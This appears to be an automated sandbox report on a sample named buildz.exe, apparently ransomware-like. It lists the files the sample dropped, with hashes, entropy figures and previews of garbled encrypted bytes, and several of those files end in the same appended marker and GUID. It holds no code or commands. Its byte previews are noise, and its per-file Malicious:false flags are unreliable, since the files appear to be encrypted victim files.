                        Preview:(func.S.....g...P.....5.~.....*..'...3.D..)....c.\. ..1.....=.7.4.._..d2.,p......n.f.!.Z .ITd..f.1?.......6@.^=.. ...:.. .....Ni]..k.......HH../.....[.......x\.....W..(.O.#....d..Z.0.....:x+.4...d.*....H..K.......j...:...|v.@..^.!.\..d...4V;Y.j.../...C...&7.9`.8.C+.......l....T...........L..........H....%..c..'.J.....5.#p..-MV..{.9-^.R,.._V.4Pw.....T..)N....-4...F..*.....u^..z..G...(.#... ...f..|%f.7......."(.Ie.0..7..2...@..J.....G..j1...K.$.> ......ItM.E..` F..v...;R.]......MA....>..,.3K8.Bt..se4.#.+z.=..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11551
                        Entropy (8bit):7.982605559571266
                        Encrypted:false
                        SSDEEP:192:I/ENWMCNaf0H9DayXEonZdD4Ypp4ZVSQS3/r464E8n/RsRsYUMdcPWvps+CxxqtB:Is2N15EYZdD4aSZVSxv86n8ZsRsYUMRp
                        MD5:03E99F066311EE45CD92E94A7B26F5F9
                        SHA1:3BE0F5A38E6ABF5B383B69E1273CD90E3D42DC88
                        SHA-256:16301D39960BC4988202B8BD9B480A61AD34885EF1A35AD69AC908826C2BCE8D
                        SHA-512:D3B5388B51360EB584D0178504573D8B9D69F3D7D7D39AF1D082F4A5DEA9999EDCF746B4D97F1EDD4460C0D9A134EF8A4FC99D8E47B7973F41385D0989676B3A
                        Malicious:false
                        Preview:{"fil.kPU.^..SX*.b.;.6...}P..P.r....Z.....~...O..{=G..z..c.S.....!.K..g..3_.{..K.c.J@K.._.....jZ4....=$s....{..Sv.M.m....`LB..P...x{#)nQ...9TZBa.C...F.2.*.kM...n.b.{u$...G.Cd..7}a.......f:.....l 0}....M./AZ._....:..&..b$.Pok.zW....~r.N.f..<=%.Ew..K......x....F......+.Y.`...x.<..k....4..._Z..dbww.0...(..N..mt........:.K..Z.!s......mXo....n.&...4.&...!.........#....).^_.H./..B...BO&.&Q..!A}F....H.x....M.....BCA|...<......=..=t.R.ZQ.F[.......vs.FROf....{.'-T........N....=kG.F..h....0...v..^.<..W...o.>4.P@..%.+X.H.....$.yL~.s.H... M.K~K.7.d$.$.. ..H.Y;.}W..x.O..h.@..d.qA._...L~^...X..C.L.....z...nJ.e..3Y.5......._'v..Q..T.CF..cko...C...V,.'....H.....|...[...'.......{OR.=..rQ=...b.".Cl#...[[.].o..(..}1./...<A3..AF.......|6.P.Ac_tl&-~..B....r..E...M".He........LPM..S..l..A:.b:].T1./o..........M#..........S$4...z.0~..N<`c....0.....n.Ut,.<Rc>.ih..j.....}...V/...T.y..00f.p."Q...I...>.G"...FfB....2... ..%..B...M+.id...L...P.\..r.x.R<S.....<..ZEh...ne
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8114
                        Entropy (8bit):7.978327809142854
                        Encrypted:false
                        SSDEEP:192:hdWlseeDjzVukSJNbp580PgQBmHgJPbAaaYgfA:vWx+XOJNj86Z16YEA
                        MD5:C3A6AF44353E18071193308A1C80C78B
                        SHA1:8FF3CDD192DD4D74C5EEB58A75B3C5E11BC50E96
                        SHA-256:C68FFE092A265F08CA4470475715FF94D7B8818E53AD8C9D6F59105976D31AED
                        SHA-512:434BF92B181F02EFF3AAC57908FC5CB21B0A5D1B7DFE5CC7807CF76085C7AB7CEBC435B829A2AD6D592E0EEC37E486FF9784D3B690319DF95BDDE8BCC8ECD9B4
                        Malicious:false
                        Preview:[{"de.2*:aC{].#.5*|t.B.....l..+..7..&........QS..C..8....v]f..._..H........g.._........^.;.G.g...M.[.M......Z".....(.N.k<..& ..M(.jm..K.,...{.1.g..#...O..,F.U...9>Q..F/..Y.....r.j...PC...W.j.R.K./../.F...&...L........M.3g..z... ..\4v.E}3.k.j:.Y..Y3.......R'k.@....z.f.Tc..'.m.7..*"..e...L.A.J.c..}.U..!a.L..(.\`s.....>."...dc.e.)/...v../.&....t..Dh...j.o.B...Z.`!?.....f.......g......:=..'A..).h.2..........a.[.^...J...M*.L....I3...r.y%.U..:.m#...>.+o....Zs.5..U..Q.#7...#x.%-~..T..:P..Dt.k.QL.m-D[jW-&b..Kcri.*.^.d.......^.)..>%}.P..x..gA.G..6I+.S....i.0`v....].7.....3.Z...8.V.@$.....E GUN..MY.Z.{.C....C....R..c.....2#.o../...9...I...Tn..B......E.v..'n.x.BA..L....e.K*..!HJ"{..{..h1s..]..i../RK..+w...."sDV......^.w...m.PCk..Xi..l.....P...A..2...W.....d...U....#H.1....<x...w..G..fW.N..N..........\.u..\k.......#..[..n....@oog...F........m.~.(<1..............)R...f...|..1._......=.....}.h...?.......|.....k...Y_....f.. ../..]j.d..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):544977
                        Entropy (8bit):6.601891560353501
                        Encrypted:false
                        SSDEEP:6144:ImGPMMIsAOwIHZln/Xz57rjF1RXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEg:LGkMSOwILn/1G
                        MD5:5B1D35FB7E05AC6A7E9CC937F8A6FCB0
                        SHA1:C642B40089C439012707077805A79D27C90BD878
                        SHA-256:32CAA53DBC4918FBAADBDDE1FC22A6637797EE6DC9F4B73507DDCC4187D08F22
                        SHA-512:B456E37375848E8CD1E113B8B31446C658DCBD12A9A808D0241291199834479BA91400736ED3D800F74F010129519D36ED4B09B3056694CE31C4C95B21D08093
                        Malicious:false
                        Preview:/*.. O..s0...1q.6$=P...O.@..5.P.`Hw*.......{.j(/...j...*.....\...L..Oo..`=bM./..P..*Z.z.~{..tA.jP.E.9.m.Z.f.....l.../.I.x..7.'4..B'.?P...;.J........*...Q..ZUX.7....$..4.._..b..)p...,. .+!XTqt.D.g........4"...fZ.........KMC.Fn.aHvjk/...J6^......T..1..y.%k=..PQ.H>..g.Dkt.A~TB...%*.....)^Tt..c.n.........q...dW..*S.7..uM..%...o..(}...S..em.9?.v...d....D.....44F.s.G..:.....O.%-f.)Llje>M..}zb.x..ls....7...N..'^~....,5.....V.F$...]..q.~..N.@@.!.....e....#, ..PuV..'..H.}7...m..Q%3.[.9.'N\...*O-]..o.:~"..+.A...3.].......@.{..D|..k1..1;....G.^..T.{te..5....~...UZ.%.s..=E4....D7..............(..S_D.9.}.Wa<(L..3aJ..G.0p....J..*...z}..;;.vh<..nZ..H..c.v.).h....N.1.J...1.6H......=..._M.h..........J..M.'...1..<..X......A.$...yV......{{x)..C=)(.X,S.....OI..g...M%..S.0gn.C....6......-V4i7....E.J.$..N(c.. p..:...D]..,5g...I.wT..N^..C.b.....V.^./...W..M.".L....^LN..c.4:.V..3M%....H.=..)pX..i........>..W..c...K...G.......F....".,..2cUM^....N.6...L&.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):261650
                        Entropy (8bit):7.485925651194632
                        Encrypted:false
                        SSDEEP:6144:PH513gQx5LTvRbra1BHtzXaMv5DLix9FNNsZ9Dd/ceO:PLwwLj9aPHtWMmFIBdM
                        MD5:D521170E4EAD3E971FA7ABD5FF6DB3BF
                        SHA1:7218C4DF39D7738DF59ABBADFA32A18CFC11831D
                        SHA-256:95A38739BD614124B71E47BDAEFD26A619398EED7A05CCBC1DF6E4FBABA624B1
                        SHA-512:F16833885D438DF04179486CBA8B918C89E6B79138BE3140322622F1E144D1BFDB0620E47F84ED3B82E1E46E2D0CB15AB593F33CAB00F5BA75E711E01A786E58
                        Malicious:false
                        Preview:/*.. ..d_x...r..?..gs>.......t6.#....(..B..,......(..=.U....9W.......Q,"..../r.q@"..FC.Q........G.....c.:..)......k...-.u3C6...d....E..h......_..~u6kv...;'.,}.n....L....<Icf.,.].....[cd.6.~.'..eG..3.t....mj..h...A.......@u.*.>.[..l8..s.P. )....O7.}2..[.i..mE.../..@...j..D.._(..."...^.".$ .....5y..AJ.M!..\.P.)ed.\.......0.......D."..&......5..&k{....X#.R..bE..;....0.H..6.q...8.."PXI.k.P.........L..-p.nX".(..Nv.. Ed.k..~..*D.!....Q.5o.....c..p....m...g....,...@.....d.<...`..~.f,zL.?l..Y...!.3..P...S.=.s.P...daq}....N\{.....>....=,..^.f.)=..1..m....?.. ~..0.....l......Z...3X.z7 ..N.(f..N.5..!-..hJt.x..s..Z5............1o..q.X.TQ.4.Q@"-4....+12+..$sj-..]...Q2.B....`}..1..f[J..:.....).zlw..T..8$..........j.%.o....w9.....v.s....tH;9.E........k.. K.$.....l.A.Ib}.<v&.U.n.o.,`........L..w.m..TJ.i.P.zF.3..y.T"nqr.a...z....$.w..%l`.X..&-..yL...n.c..y!.k...|.8Fw.f.|.b{%....v.......#.Qmm/.=,f.&O..T...5...C...9.P@.87...i[.{..7..C.|.....A.@h]|...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2075
                        Entropy (8bit):7.902582792869369
                        Encrypted:false
                        SSDEEP:48:xeFhldsv6m8Ev/Vg9gS+h93vE+nytlaOFtc4SCMHoiLUD:xeFhluim8H9gS+h9fFnoFDwHoiLA
                        MD5:9D9312BF481B00DC062471A66B170C6A
                        SHA1:1F76534A392B9C4222BB7CF0816973D34A386CF4
                        SHA-256:5FD24F12EC3EDC2380E372AF0F0C788F07D3113B1C84CF8ABC812039AF3111D7
                        SHA-512:E7F9C2F512D8206A88BDBCB03B2C67ED0EE40DDE6F194591A3DD4A4AFA4FB0FA12E0997D02C9F7013A601D4A18757477E5030A14ABE887C1998EA10EB427343A
                        Malicious:false
                        Preview:html,..n........V.,Z.D...8.P.E.\A.`..D6m.."mv..^.....\.....?3...a......+.rw..6$7....t.G.v.C..3..0.YQ.S.=LS.@...1D....-....2Mh.e}.?*KF....I..L.<u....2....*.38'@.>..sI...........*....gl>2..P...ee.}.U.|."O......H@.x.I........E...Hs.f....4...'sk(.[.l..q-."..*.@.!...?....@.K`n.z..L ......UL........._W......O..}U.k........}.+-.lgD.,....^.:..M........X.....S.....N.Yh.P.n.....e..p..,M....!.=._.....WA.N....l....F....../i.._.cp#-%.....-.Xc..q...LM=.........E....ib...o.G.*(.........P,...{..R...e_V....u0.....s.MZ.Z.Y..,@^....c..)..i...-.041,{..!..V./..C#b........G...;..o....e.Z...i:..8..j.....6o ...I.l.|r.sd....rI..r....2..y..f*m/R.._4d.Y.8...m=....db..=.........U.X..DA.....tO.WC8.\..D.....B....?+>E.Hm....H@?....y...u.q..m..c....D..b.b.8=........i..-........V...+.0.`JL......\.....>.f....y...Z...9k....|>...O).t..8...'....PxEh.....+Wm.S.,].3........p".....c..5.`>.n..4I.s....... .|E,0Yl_J../.. ...<.e...Cn..N.r..I...`(M.nX6.VU[...8+<....X..mv..j8......C.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1144
                        Entropy (8bit):7.79979054851477
                        Encrypted:false
                        SSDEEP:24:Nr2DZscw6fGXGKgcJQyMZD02ruqhJf4+6WXoP4ZPMNUEGbD:Nr2Dn36GKgcJ2Qvqh2woP4ZG5UD
                        MD5:C97AAE576FBE8A99E93BC3171D76CB90
                        SHA1:2F0625CA163CEBBE8B40BC312F9051EE2EB7B519
                        SHA-256:DD5AF86408022C714BC483A0F01D2DDBFFB3797B3E314364F688DB6FBFD4AE46
                        SHA-512:C6F4EDBC782ED7DB54B407689D1FC2FB5F0909280DA2D9EA72B2B819603F48F709055B11718EC0A7AA3A671FB4119DCC95B84196E24044C91963A603EBA7C7FF
                        Malicious:false
                        Preview:<!DOCSM....k...Q.o....&".5b........B0...,.n..Z..e..'.}.....q..m2..q..@V.. ..u_...V.5.N..:..>m..-.{m..*.y.+.......{.R..^rMJ..b.#.b..v.....h......WdB..U.B..;.....kA..K0....%.:4..z.y.+N..Q.d.k.A.N........{..-6X.O....=..P.@.R:....~.&..s.N.Z.H..Y.3LDx."..z".c..U.c.1.T.mj...O!U.' 4..-...k...z..cfDs....7y.....O..l:m.U.....(....2M.o...w.X.`.!......!T.A..u...se.......6;.N|^O....Sj....b.y1f.y.3Ex.........5K.F.b .x.......<W....L...+....a;.......y:=.;..[.*..6.=j..#6.Ka.LV.w.....Q....RJ..f...6nr....|.....@..F..?....=.Z....B.&I2....Q[mp.2*.B.......%....5.P.ygJ..j..h.h..C6...E).]#.....[tH....Yk&..`.....v.Dc.JB/:.+..#....x.$5aO.Q.@..(-p$.81..6.v....>..p9.....z.Rl........a...'.q.).......r1.....Fm..U.N..T.....Y.gx....0.q.X~3..].v.PX.1....#....(.`..Df%.....! ...~.L......E......j..Dn..#.,...._.Nwy...!....q>.C.v.0KX..e..tuL..5..PE.s.....X.........3...X...W...K._.U../W..D.].....J4.k..v4...U...@.../..zA..`..@+.T...D...>.....^.}.C.A...".y.P.....l.W.G;....U.F.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:GIF image data 8027 x 24812
                        Category:dropped
                        Size (bytes):70698
                        Entropy (8bit):7.997662077957352
                        Encrypted:true
                        SSDEEP:1536:oyqT+kgugVvUDaqIOJoJ6u/xuqBQ+EFIufpHwBlHneA:6IMDTnJyhGhRfOHeA
                        MD5:18964A02B2AC2B609A456A6E303C63CF
                        SHA1:85AE3E84D9917CD8179B773527CFBB5FD944B834
                        SHA-256:5F840422F848FBC10A1D41F5E9D550DF3D925A5EC37186B3E22A5574B6C7AA5C
                        SHA-512:D55DF96D0C61D96300601AE937B7BFDDD7BD4DC717506D55514DF4182D94393BA038F419B8B18D7646A872D935C29AD947908DD188A93629B7E6D75F2138D890
                        Malicious:true
                        Preview:GIF89.[..`>..3t.V]...&S{.....z.z.'ywVs...\....N.!..lo.D.6EI.yB.......o.b.T..z'.Q...=...<...d...c..2...,L9.....)e....I.#R.#.qY..B...'U.K !....q.I.@..\..h2.e.L.,......?........-.N^...I..^...!..mf.I.B..s.B.4......62Z....Cj.....z.....Oz.D..K8...6.GW...%....T4.........."@V.9\e,0.5..l.w>8.+&.........c+.Q"P..<....t0FH(.E..n>...\W..o.+.....2....p.K...1.:j\m..V7?V.2..:...Zfi.t....i.....*gY..M83..N....@VA.x........O.%]...........#!.n.....5ux...-.F....T.~.U.....[LRQ.sh...l.r.....I!u.Z..k..n...r.!8. d.[...`,"Y......+.[.=..I..A.i.8.q.(..y..;......w(.g.. .E:/U.%_sC...\.1z..u..y{......6.......i.......`%.?.V\...r.1..=..i..z.}.U..J....J.|.9w.Lu...(.......9..:Y......=.D.4.\6..<.i..z.....&..?EF.....^R..5<......L.....d.!.c.iG.......N..^..@-%..?.. :...<...6...%a.APK........j..;.].P.....u#.....O......>.G....T..J..S...B.q...V.j.-)........*..`.E..;<......nP...{$.B...a..I}."..My5...2y...o<....F.P....9..,...#....Zp {K..&....h..C[.;(|}38..q.9.o..`..f"..Xw...#JE..cLh..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4698
                        Entropy (8bit):7.961462256781825
                        Encrypted:false
                        SSDEEP:96:2TYHWOLF3McQfBres1KNFZFEfowQH6jtLyYfm1YF5PM/RDEMNLZC0V+A:2TYHycEhKNFZ+fJIUov105kpDE2C0cA
                        MD5:0C987BE5D65B353CA1747E8E41B2EEBA
                        SHA1:0E9582D4391D05751563D3DAE98FB2A70FCA26FC
                        SHA-256:CFAD74BFA1F849C3D1721C5AF68B70E489BFB11937D7F95BB1FEDE151A9CAF79
                        SHA-512:6151DD6CCFA0920333E2A1D397A123CA2B4EB11AEC75E8F45805A577F6864DD1157C962057DB28065F25A688517223251DCCD61CA0120266508B04B87F4AF409
                        Malicious:false
                        Preview:.PNG...i.c.+......r.,9x....|I8WF.u.._.......-..c.5+../...K.:~...........7cH.b....I.@.w.ys...>...F...{.`g.w.....\.AD..A.4..B..........d...e.U....<.{.n.c#...|../vL0...#c.1[t&G,v.~.w.(....?..G.....n9..?....h...k.P..g...N....K.....nDS\...@..L..8.....H...'...|ml...y..6.P3...a.G.....s......n.r.....`....*y...FM..Q.........G..,H.X4.R."...R..Yb.....!.....8).U.},.3|..S'.4...C.H...l...`..v6N...},ik,.vH_C...../.$_bd.K6..?|T...jc44U..._..H...'X.../uN......@#..&.K.....>1...E,....&f....`'h.9K....s.."[..s..4v...n;...m...W> ....].O.9.._R;..j.....!&....AO..^...r*..0...X.N......Kf.t.....S......$...(.....3..y.[ ..Kb....k...Y..d.YlwH..]o..8..*.B.......B....S.x.+.N..#j-&..x......%...H..^.8@...s.3...wN.P..5.J.K....=...E..w....i....f.)..S........>.....3.@M}......\....7..&R.s{.AIA_.s..ZO....!\.Fr..@.49...O..$....2.4...X..L....q.tP.l...0h'.O..y.(W..0..E......hr.....(O.P^....zW.1.!...M'.......4.j.....&.....*...p=.]E....$z.z.....FW......@.....-z.0/...aa
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):892
                        Entropy (8bit):7.751630525264233
                        Encrypted:false
                        SSDEEP:24:7IFVOZ6GyqHcyRmL+cqbsde6dnqwlX2/E/GbD:fEGZRRKTnqwlX2/E/UD
                        MD5:3E18FF7844AEAF22E2D223BAF157CD2F
                        SHA1:326CBD3AD41FFDB1F05AA839CCDBD89B6AF7B6E0
                        SHA-256:EF55AD6997714CEB3797B16D43CB0B041D5815DB0F55554CDE1C17D12CEEF509
                        SHA-512:8AF821555E58EE97031E70788F08829F189F7CD273C9F16955EFB1925465050EFD476ED8C7D52532211D291E996AB5EBF59FF1E4E8A3913D6130E791C4A9FDD7
                        Malicious:false
                        Preview:.PNG..7R..6h..N6b./.J.i+u...........X..g...6..=..3..*y."T...Nn'..T.+.f..7P.+. .........\..._2.w.7.$......e...m.U.m....-...)..?.e..g..r,v...v.f..A.Q...."...0|z....^z..=E..M..q...K.....T..Q.)...N+.$..Epn8_e.....i..}..].._.~m..'..[..&.f.....-.N..eJ`......)+.K......a.oU3.0..B^r@h.W..!46..<.7g.eq.....$l.HxUq.._HU.k,.(...96~.\.A...>.....z.#%.A..|...".m..5....._...a..=m.....N..-..............."..7e..&.....;g..S.v..=?R..o...?.Up..V..}0S...P. I....&.V.....`".2. ..'.FO...M.j .|..V.D.......{....._S;G..s..z1.PXq...0]....;.....(...}5.z.....d.].Lc1..=I.(.D.k....QNC.?a.......[U...d......6."..........d.4.n.iZ:.+.&of.g.......+.Qb.D#..\-.k\...74j_...!....c....2./rE..q;...T.A_..l....sDI..f(Tf\.?....H+..6...".....#.....H....T...../.,R.............9..J$s...F.h.F_....]+...uQ%.dMij..JY........N.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):494
                        Entropy (8bit):7.466935356473292
                        Encrypted:false
                        SSDEEP:12:uMxvvUGiMVXpUHEGnNH4/pDzI4n2yn6feeMz26Gcii9a:2jYRzt2yHN7GbD
                        MD5:068183A4FD38506DF55975B6AA22137A
                        SHA1:027998A967E346AE783BD1EB07445AFFE5EE7E4A
                        SHA-256:E2F5A0AE9080143B5C55BE5681367C7C03549B6E0757C2F8978CC9E10A54BAAE
                        SHA-512:B9C64A27891CA232372B8B6C5D774E958E947FED3E2AFB42020A6455A357289F45D86018F8BD894A3430225350C345654A9CC79721878FE1F259CBA63B9486F3
                        Malicious:false
                        Preview:.PNG........{....}.uG.\....]?...:.%..~..+.....<...-..*.K..3W..%.H..%m..GWJ.1.~.{.r.z.G.Q.0..Z.{.q5....`.."Q...*-4....z..,.}/.%zs.-$;y...?Fdk)w'MA..?!...e..+l...k.\..6w....D1sD...\6..7=#.f.*...a\.I.S..1.R...FUY.WU.nP.].DT\N..Y.....X..*.....p......v....m.9...X...*.J.\t... ............;.;.^..r.p.Nn.`k..9@.....`.........0..B.r....=...a.BLc.&..@.P.K%.Mi.R*.L.......&.._K.P~..sF$\e..O.r..[..j.N.QDf.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):586
                        Entropy (8bit):7.621450773976229
                        Encrypted:false
                        SSDEEP:12:phB4cKXFlY+gRKh7teYX6tN40J30XPjE7QL4U/26Gcii9a:rBOXFlxgo9qAo7QL4aGbD
                        MD5:8C3B329F3389D98F0156CC8EAFDFCEEE
                        SHA1:D5F4BC14136A2A92A9D389D3159D540F1D8F8D06
                        SHA-256:ACD1D61025C037493B4C0DC74726E000E9560EB4DCAB5D455D819C051B4E2BA1
                        SHA-512:9F5CD542762532AD3A77731B346198D194C76ADFE2F1BF1ABE65FAAD1DA9BE14FEA75A85E82F14151FD6D2D0E4BCFB5CABA48A9FFF09F5C2397E643183BE52D0
                        Malicious:false
                        Preview:.PNG.."#8...=.1..0\c..O.i..ss.W.F.........R.E.....#..:J...-.....9...POWt.@b)\..Uw.8...z.........JW.om.(n...@.{Hx.,.... z.M..fD>.'.PS...^....:..g.q....!\.....u./D..V.J..f...>...U.K.M......a.*..b.......aP.`..u.h..x+...g#.L...xt..+.'.`.8.b.U+...v..[..A...n...Ay.?...G.l..y.e.T(E.X....Q..3.(...].(.'Lc..&B.M3}\..O.\...%g....@.. rI.3k%.VN..j.55..wa>B......NV.&..:q,.{_..Q...2...u.7...>40......Y(m....a.....M.NR....=.a.j...+.d........*..l&U..5uFS0.K...r.J_..,..j....\|&...C..pEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):494
                        Entropy (8bit):7.513611023596889
                        Encrypted:false
                        SSDEEP:12:uP3HZXliF2bhXiBdnlmoapMladyyBhaWx6I726Gcii9a:o3JGmgadVhlTGbD
                        MD5:5A0C1015FE49C19221E7D0CB4A88888D
                        SHA1:2FF0139E4CBC738050F0AC74A1303198E6D6FA96
                        SHA-256:CE1F4977945C81E2E128A1D1CB028E8319A6095E6176242E3FB421A7E38A52B0
                        SHA-512:7FD30801621729D97A459363DCFF7F84218D584FD452791BE02FBAA5E8A2C310C832229021A08A41CD6E44BE6F5AC8545DA286B741747B7DD71561987A32E676
                        Malicious:false
                        Preview:.PNG.H..o..ZGG...!.h..."..A.1...z.....^._...o.n....C5...b.:.u...E...n...~...bW...0.............D... .....T.G.F/]....aJ....2.qs'.\,.M....?...6..-.C.....+.z..H.....]..o...&>)..`.%.7.y...l.h.G`/.:."T.8@7.wK*K....o.....Gw....\..l7km.....9..:R.kX:......i".Cp...C...........V.P.4...TpLy.K.4..@#".C..C.s.j6B..............=..$.&.".(.Q.9.S.$r...F.$Q~M..3eRP.aI..J.5..Y..rC......,.m)I....L.G.S......h....=.C..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):500
                        Entropy (8bit):7.509757985619438
                        Encrypted:false
                        SSDEEP:12:SUCiTAlAhxIdRLXy75LTpnCg4Ld9wNVX4aivUWyany26Gcii9a:nJRtMgOQGaisWybGbD
                        MD5:FAFA1F6AE592410B86B6657AC1BA0CEC
                        SHA1:929A395916AA1C6B98F4EEA9550B80539EF10B78
                        SHA-256:0BE6E0082A610C253E5347FC41F5A44E1BA856B735462E4783EF747E3A5ED5C9
                        SHA-512:082A6E31899EEAFE825BE958111646D8143897409EA6343643581A17283217E3EB04A788C6949D2A65192720CF23B8914705867E1C80F98961A39E8BCF63342D
                        Malicious:false
                        Preview:.PNG.<V..{1#0..B.. U...e.. ........K..n.......Ut.p..I%.2..X....{.N....^.n.*.5>^.....6.Eny.Z.i......L.B..MFpT....y...../WWu.o....Z....{wa.._...O....'P\Z.J.T......s..*..'e.....F..Z.ma...(U.eV)R\.U,T..J#.r42...I.i....Q~.4.1..Q....[..5.h..U..9..AWA..0.s.~xD.8........D:...f..D..9st.74.[....Z._...7O....9.}.w...._...h.M(...<..w..t.\..M.J...9.......q"...q./..#&4.|Q@.bb[.'!..@....._..j4`..'..N!N..^n2-W.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):494
                        Entropy (8bit):7.5043900588965995
                        Encrypted:false
                        SSDEEP:12:e8MiRKvuWpVfs2UnwxaY3z+y+ZD9c+vs3QF26Gcii9a:xZauoUnwxD32D9cj3QRGbD
                        MD5:3809C340699268069462B2568BF92E00
                        SHA1:E846B08BC311AE2835F5AABA9694B38E6ADF22E7
                        SHA-256:0B67148868FBCF1D6EDE7535B0080FEBB11D291C4A4ECFE11DAD810BE2973E32
                        SHA-512:5A1AF04B6A026376E0FB41044BD5754A6C45DB579FC9E20717DA0780C781C247ED676E03424869468792571C5F541BC1E2CDAF35E89D5CF960E9C1D3179AC326
                        Malicious:false
                        Preview:.PNG....~ ....4..l,7B.u.....1.<.+{...Y@....f..~.:".......z...\.+..9..c).Y.#.Mf..u..0*C.s.:[ZD..J+.......}6....U.k.(......|9ksl...J{9T.T...h.~.X...~i.4.&...../..W0..4e$%.....b....Q..0...u..........F....E(V.!..k6..d".o..h.b....zc`K.......^U..@.".m 7z^r.O.....f...<..._....$.O...Vh..?..Q..../.1...|?..f..`.>....q'+...6..=d..^..z.......x..^.l..2.e......_iZ..,jf:I<G.f.._Gs.7.:.L.a`..\~W.[;9.$..Y.y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1656
                        Entropy (8bit):7.870390496155318
                        Encrypted:false
                        SSDEEP:48:n/Ak+xTiZzJK7yP9NdZV91XteyyH8tw4H7UD:nXCDyLzVr0yS8twgA
                        MD5:BDCBC14E8B6244F7C19110D23BAFE8C2
                        SHA1:5DA3FF28C2852E551B7556A492842A7FEFD7DD49
                        SHA-256:AAA06869BA8B7F8398384B24717381E3D6A884435337EDB4F64A25D592C406C4
                        SHA-512:58838AE99FEA7B7299CA8A7EDD2B2BAA5B5A23D6D66962C4BFD98471DAB99B2A45A68886190621EC4C8E385D6717A4B26FA3D8989F28C0D545B39A1BEFE917F3
                        Malicious:false
                        Preview:{.. .........fB....'^..._6..J........h..i"9.M....L..Ux...@9.5Ox...4.`k...8t..Bha.e...n.).j..E}.a..d#...V.K\.LP.R6...R.77.bBz6.I..V.G.qU....._......@...tr.-T.....?..D...Fb..B......n.U.?.U.ls.?.<............I....w...D.$X9...<.U.3.fW=...G..\..y.s..b#..g...yyp.s.v....\..Su{.................Q.........L.w.........xo..lZ...,q......5J.|.fHKr1...(./.}.aZ..t.....f).......S.gc./d.nG`...oo..Bk.>.!..NW.@y.kE].;...W......&V....i..s.q..7....6....H.&.......Qcy..u...-.K4`O.W..( .`r..|..1...j.<$.>|......#......<..Hc?:..`zRc-8.JG.gi....[............E.W....M.X.K.....G..@.....w<.5....or......h..:...k..?..(-...B......1....^.np.EP.U.t.Y.w_.X.ih.c..../k{..HB...%..-....s..S...aH....w....-...9.\...e......0g.Y....T._..K..O.b......+q...B.cdI.p..55..'m...d$p+..&...q*.V.N.9P.... ."........0F....mV...5.4..L....#..S.Z.....J.<O d.N.....Y.r..kI.S.F....R....[B1VU.U.h...Q..,!.%k8x=@.........&...C.-.,GJ.L.J.k....I....[.........:..F...!*..+..3../.....Z..T..3pr.Wy..z*1....Q...Z.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):509
                        Entropy (8bit):7.538523904490509
                        Encrypted:false
                        SSDEEP:12:S2TuI++L4z3f7KporlmlINgB9R9GF0agOTkBC6igm2uKdz26Gcii9a:9TV+k4z3DKporlAI6B9R9G5gukjXpGbD
                        MD5:C6735C0C347A6025EB0DEEACE260E14D
                        SHA1:16A773DBF9B5DABF986F9826AC3A9BEEF4F2C1EB
                        SHA-256:0199E30856AE283259558E2ADA4D0C104802965F4C233B12F80B0A58B7A1687D
                        SHA-512:DEE4826D2299576C2F11F701FF0FEAA559DF7A7FC1BE808356C5C95E1E33F4DD17272CF46E77233613D0D933C427EED4024AE2C51D4ECE4D9FC8285DF51E9F4D
                        Malicious:false
                        Preview:*...#.....>..P.,....%n....sn...*.h..=..z...+J.@.6.,.(!.Z0VaUc..{.4.RB............U...[1........T.~.Uw..H.s...3....&.%cX.i.O.w(&M.C.VaA...O:....|.=.....D....u1v..T.7.2.......m..K@..d...Y.(V........V.^...`.}..v.C..DIG.C|..gsy.(.U.mq.../...I.9.V.-o..?.4..5Y(Wc.`..$...'.B...c....y.O....f.q............*.8..qn.Hi.b6....T..W....[.8.^..."n.'.kT1/..4....|.Q..x..]T+.&..U...B..#....X|.'r....v9.`.6...(...g....*EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):374
                        Entropy (8bit):7.24379565821912
                        Encrypted:false
